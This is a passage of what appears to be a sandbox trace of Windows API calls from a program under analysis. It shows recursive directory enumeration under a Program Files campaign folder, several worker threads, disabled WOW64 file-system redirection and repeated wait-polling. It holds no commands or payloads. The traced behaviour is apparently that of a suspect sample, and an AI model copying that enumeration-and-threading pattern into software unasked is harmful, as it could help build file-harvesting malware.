ftLastAccessTime.dwLowDateTime=0xa77fb761, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e34a1b4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-ES", cAlternateFileName="")) returned 1 [0321.627] FindFirstFileW (in: lpFileName="C:\\Program Files\\UNP\\CampaignManager\\Campaigns\\{91be532c-f9f1-406a-9858-43697c6f437a}\\Content1\\ca-ES\\*", lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa77fb761, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e34a1b4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x39489a8 [0321.629] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa77fb761, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e34a1b4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0321.629] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e34a1b4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x32e4c500, ftLastWriteTime.dwHighDateTime=0x1d3225e, nFileSizeHigh=0x0, nFileSizeLow=0xa0a7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="index.html", cAlternateFileName="INDEX~1.HTM")) returned 1 [0321.630] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e34a1b4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x18026100, ftLastWriteTime.dwHighDateTime=0x1d2c3e2, nFileSizeHigh=0x0, nFileSizeLow=0x260, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastbeginupgrade.xml", cAlternateFileName="TOASTB~1.XML")) returned 1 [0321.630] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e34a1b4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x6e978800, ftLastWriteTime.dwHighDateTime=0x1d2d919, nFileSizeHigh=0x0, nFileSizeLow=0x1a3, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastbeginupgradeth2.xml", cAlternateFileName="TOASTB~2.XML")) returned 1 [0321.630] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e34a1b4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c4a7800, ftLastWriteTime.dwHighDateTime=0x1d2db6e, nFileSizeHigh=0x0, nFileSizeLow=0x1be, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastreviewsettings.xml", cAlternateFileName="TOASTR~1.XML")) returned 1 [0321.630] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e34a1b4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c4a7800, ftLastWriteTime.dwHighDateTime=0x1d2db6e, nFileSizeHigh=0x0, nFileSizeLow=0x1be, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastreviewsettings.xml", cAlternateFileName="TOASTR~1.XML")) returned 0 [0321.631] FindClose (in: hFindFile=0x39489a8 | out: hFindFile=0x39489a8) returned 1 [0321.632] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.632] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa78433f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e34a1b4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-ES-valencia", cAlternateFileName="CA-ES-~1")) returned 1 [0321.632] FindFirstFileW (in: lpFileName="C:\\Program Files\\UNP\\CampaignManager\\Campaigns\\{91be532c-f9f1-406a-9858-43697c6f437a}\\Content1\\ca-ES-valencia\\*", lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa78433f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e34a1b4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x39485a8 [0321.872] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa78433f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e34a1b4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0321.872] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e34a1b4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x32e4c500, ftLastWriteTime.dwHighDateTime=0x1d3225e, nFileSizeHigh=0x0, nFileSizeLow=0xa0a7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="index.html", cAlternateFileName="INDEX~1.HTM")) returned 1 [0321.874] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.874] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa78fe34b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3703fd, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0321.878] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.878] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3703fd, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa795f898, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3703fd, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0321.883] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.883] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3703fd, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa79714a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e396633, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-AT", cAlternateFileName="")) returned 1 [0321.889] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.889] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e396633, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa79bb5f0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e396633, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-CH", cAlternateFileName="")) returned 1 [0321.893] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.894] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e396633, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7a12def, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3bc889, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0321.899] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.899] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3bc889, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7adca7e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3bc889, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0321.904] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.904] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3bc889, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7b18143, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3e2af7, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-AU", cAlternateFileName="")) returned 1 [0321.909] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.909] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3e2af7, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7b914a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3e2af7, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-CA", cAlternateFileName="")) returned 1 Thread: id = 43 os_tid = 0xe08 [0280.444] GetTickCount () returned 0x113f40b [0280.444] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x4d6d00 [0280.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x4d6d00, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x304 [0280.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x4d6d00, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0280.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x4d6d00, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x30c [0280.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x4d6d00, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x310 [0280.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc330 [0280.447] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc330, Size=0x20) returned 0x4addb8 [0280.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc270 [0280.447] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc270, Size=0x20) returned 0x4ae038 [0280.448] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0280.448] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0280.448] Wow64DisableWow64FsRedirection (in: OldValue=0x2fcff7c | out: OldValue=0x2fcff7c*=0x0) returned 1 [0280.448] lstrlenW (lpString="kernel32.dll") returned 12 [0280.449] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4addb8 | out: hHeap=0x470000) returned 1 [0280.449] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0280.449] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae038 | out: hHeap=0x470000) returned 1 [0280.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x4d93c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x314 [0280.450] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0283.210] GetTickCount () returned 0x113fed8 [0283.210] GetTickCount () returned 0x113fed8 [0283.210] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0283.510] GetTickCount () returned 0x1140001 [0283.510] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0283.793] GetTickCount () returned 0x114011a [0283.793] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0284.040] GetTickCount () returned 0x1140214 [0284.040] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0284.336] GetTickCount () returned 0x114033d [0284.336] GetTickCount () returned 0x114033d [0284.336] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0284.604] GetTickCount () returned 0x1140437 [0284.604] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0284.853] GetTickCount () returned 0x1140541 [0284.853] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0285.138] GetTickCount () returned 0x114065a [0285.138] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0285.425] GetTickCount () returned 0x1140773 [0285.426] GetTickCount () returned 0x1140773 [0285.426] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0285.785] GetTickCount () returned 0x11408db [0285.785] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0286.064] GetTickCount () returned 0x11409f4 [0286.064] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0286.276] GetTickCount () returned 0x1140acf [0286.276] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0286.453] GetTickCount () returned 0x1140b7b [0286.453] GetTickCount () returned 0x1140b7b [0286.453] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0286.577] GetTickCount () returned 0x1140bf8 [0286.577] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0287.483] GetTickCount () returned 0x1140f82 [0287.483] GetTickCount () returned 0x1140f82 [0287.483] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0287.673] GetTickCount () returned 0x114103d [0287.673] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0288.058] GetTickCount () returned 0x11411c4 [0288.058] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0288.369] GetTickCount () returned 0x11412fc [0288.369] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0288.746] GetTickCount () returned 0x1141473 [0288.746] GetTickCount () returned 0x1141473 [0288.746] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0289.332] GetTickCount () returned 0x11416c5 [0289.333] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0289.835] GetTickCount () returned 0x11418b9 [0289.835] GetTickCount () returned 0x11418b9 [0289.835] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0290.320] GetTickCount () returned 0x1141a9e [0290.320] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0290.689] GetTickCount () returned 0x1141c05 [0290.689] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0291.073] GetTickCount () returned 0x1141d8c [0291.073] GetTickCount () returned 0x1141d8c [0291.073] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0291.363] GetTickCount () returned 0x1141ea5 [0291.363] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0291.654] GetTickCount () returned 0x1141fce [0291.654] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0292.031] GetTickCount () returned 0x1142145 [0292.032] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0292.293] GetTickCount () returned 0x114224e [0292.293] GetTickCount () returned 0x114224e [0292.293] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0292.550] GetTickCount () returned 0x1142348 [0292.550] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0293.135] GetTickCount () returned 0x114259a [0293.135] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0293.445] GetTickCount () returned 0x11426c3 [0293.445] GetTickCount () returned 0x11426c3 [0293.445] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0293.923] GetTickCount () returned 0x11428a7 [0293.923] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0294.399] GetTickCount () returned 0x1142a8c [0294.399] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0294.931] GetTickCount () returned 0x1142c9f [0294.932] GetTickCount () returned 0x1142c9f [0294.932] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0295.468] GetTickCount () returned 0x1142eb2 [0295.468] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0295.956] GetTickCount () returned 0x1143097 [0295.956] GetTickCount () returned 0x1143097 [0295.956] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0296.444] GetTickCount () returned 0x114327b [0296.444] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0296.761] GetTickCount () returned 0x11433c3 [0296.761] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0297.241] GetTickCount () returned 0x1143598 [0297.241] GetTickCount () returned 0x1143598 [0297.241] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0297.630] GetTickCount () returned 0x114371e [0297.630] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0298.103] GetTickCount () returned 0x1143903 [0298.103] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0298.627] GetTickCount () returned 0x1143b16 [0298.627] GetTickCount () returned 0x1143b16 [0298.627] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0299.322] GetTickCount () returned 0x1143dc6 [0299.322] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0299.681] GetTickCount () returned 0x1143f2d [0299.681] GetTickCount () returned 0x1143f2d [0299.681] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0300.173] GetTickCount () returned 0x1144111 [0300.173] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0300.421] GetTickCount () returned 0x114420b [0300.421] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0300.677] GetTickCount () returned 0x1144315 [0300.677] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0300.901] GetTickCount () returned 0x11443f0 [0300.901] GetTickCount () returned 0x11443f0 [0300.902] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0301.106] GetTickCount () returned 0x11444bb [0301.106] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0301.655] GetTickCount () returned 0x11446de [0301.655] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0303.686] GetTickCount () returned 0x1144edd [0303.686] GetTickCount () returned 0x1144edd [0303.686] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0303.908] GetTickCount () returned 0x1144fb7 [0303.908] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0304.031] GetTickCount () returned 0x1145034 [0304.031] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0304.324] GetTickCount () returned 0x114514e [0304.325] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0304.576] GetTickCount () returned 0x1145257 [0304.576] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0304.878] GetTickCount () returned 0x1145380 [0304.878] GetTickCount () returned 0x1145380 [0304.878] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0305.123] GetTickCount () returned 0x114547a [0305.123] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0305.540] GetTickCount () returned 0x1145610 [0305.541] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0305.869] GetTickCount () returned 0x1145758 [0305.869] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0306.087] GetTickCount () returned 0x1145833 [0306.087] GetTickCount () returned 0x1145833 [0306.087] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0306.297] GetTickCount () returned 0x114590e [0306.297] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0306.584] GetTickCount () returned 0x1145a27 [0306.584] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0306.953] GetTickCount () returned 0x1145b9e [0306.953] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0307.633] GetTickCount () returned 0x1145e3e [0307.633] GetTickCount () returned 0x1145e3e [0307.633] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0308.144] GetTickCount () returned 0x1146042 [0308.144] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0308.475] GetTickCount () returned 0x114618a [0308.475] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0308.823] GetTickCount () returned 0x11462e2 [0308.823] GetTickCount () returned 0x11462e2 [0308.823] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0309.109] GetTickCount () returned 0x114640a [0309.109] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0309.419] GetTickCount () returned 0x1146543 [0309.419] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0309.605] GetTickCount () returned 0x11465ef [0309.605] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0310.387] GetTickCount () returned 0x11468fc [0310.387] GetTickCount () returned 0x11468fc [0310.387] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0310.715] GetTickCount () returned 0x1146a44 [0310.715] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0310.841] GetTickCount () returned 0x1146ac1 [0310.841] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0310.971] GetTickCount () returned 0x1146b3e [0310.971] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0311.071] GetTickCount () returned 0x1146bac [0311.071] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0311.181] GetTickCount () returned 0x1146c19 [0311.181] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0311.339] GetTickCount () returned 0x1146cb5 [0311.339] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0311.473] GetTickCount () returned 0x1146d32 [0311.473] GetTickCount () returned 0x1146d32 [0311.473] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0311.571] GetTickCount () returned 0x1146da0 [0311.571] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0311.681] GetTickCount () returned 0x1146e0d [0311.681] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0311.790] GetTickCount () returned 0x1146e7a [0311.790] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0312.249] GetTickCount () returned 0x114703f [0312.249] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0312.493] GetTickCount () returned 0x1147139 [0312.493] GetTickCount () returned 0x1147139 [0312.493] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0312.685] GetTickCount () returned 0x11471f5 [0312.685] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0312.841] GetTickCount () returned 0x1147291 [0312.841] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0312.953] GetTickCount () returned 0x11472ff [0312.953] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0313.066] GetTickCount () returned 0x114736c [0313.066] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0313.164] GetTickCount () returned 0x11473d9 [0313.164] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0313.662] GetTickCount () returned 0x11475be [0313.662] GetTickCount () returned 0x11475be [0313.662] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0313.947] GetTickCount () returned 0x11476d7 [0313.947] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 